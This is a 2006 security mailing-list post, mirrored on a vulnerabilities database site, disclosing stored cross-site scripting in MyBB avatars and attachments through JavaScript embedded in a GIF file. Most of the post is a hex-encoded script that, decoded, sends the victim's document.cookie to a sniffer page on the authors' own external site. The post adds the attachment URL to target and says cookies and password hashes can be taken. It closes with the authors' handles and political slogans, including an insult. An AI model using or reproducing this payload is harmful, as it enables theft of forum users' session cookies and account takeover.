Security Advisory: MyBB Html Injection ( XSS ) - security vulnerabilities database

[EN] securityvulns.ru
no-pyccku

Related information
  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
  [SA21648] Fotopholder "path" Cross-Site Scripting Vulnerability
  [Full-disclosure] [vuln.sg] Cybozu Garoon 2 SQL Injection Vulnerabilities
  [Full-disclosure] [vuln.sg] Cybozu Products Arbitrary File Retrieval Vulnerability
  eFiction < 2.0.7 Remote Admin Authentication Bypass Vulnerability

From: Redworm_(at)_MaiL.Com <Redworm_(at)_MaiL.Com>
Date: 28.08.2006
Subject: MyBB Html Injection ( XSS )

Hi

################################################

MyBB Have Xss In Avatar And Attachment.php

################################################

HEX editor With GIF picture Open , JS code are writing.

~~~~~~ GIF89ajscode ~~~~~~

Js Code:Hex:

&3c%73%63%72%69%70%74%3e%69%6d%67%
20%3d%20%6e%65%77%20%49%6d%61%67%65%
28%29%3b%20%69%6d%67%2e%73%72%63%20%
3d%20%22%68%74%74%70%3a%2f%2f%77%77%
77%2e%68%61%79%6c%61%7a%6c%61%72%2e%
6f%72%67%2f%73%6e%69%66%66%65%72%2f%
73%2e%70%68%70%3f%22%2b%64%6f%63%75%
6d%65%6e%74%2e%63%6f%6f%6b%69%65%3b%
3c%2f%73%63%72%69%70%74%3e

#################################################

We are joining official to the page,but Attachment do.and attachment taking the address.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

~

http://Site/MyBB/attachment.php?aid=?

Cookies , MD5 able to take

Redworm || ZeberuS

Redworm (at) Redworm (dot) Us [email concealed] || ZeberuS (at) ZeberuS (dot) com [email concealed]

Kahrolsun Pkk Aq

No War Israel ! Stop War !

wWw.Haylazlar.Org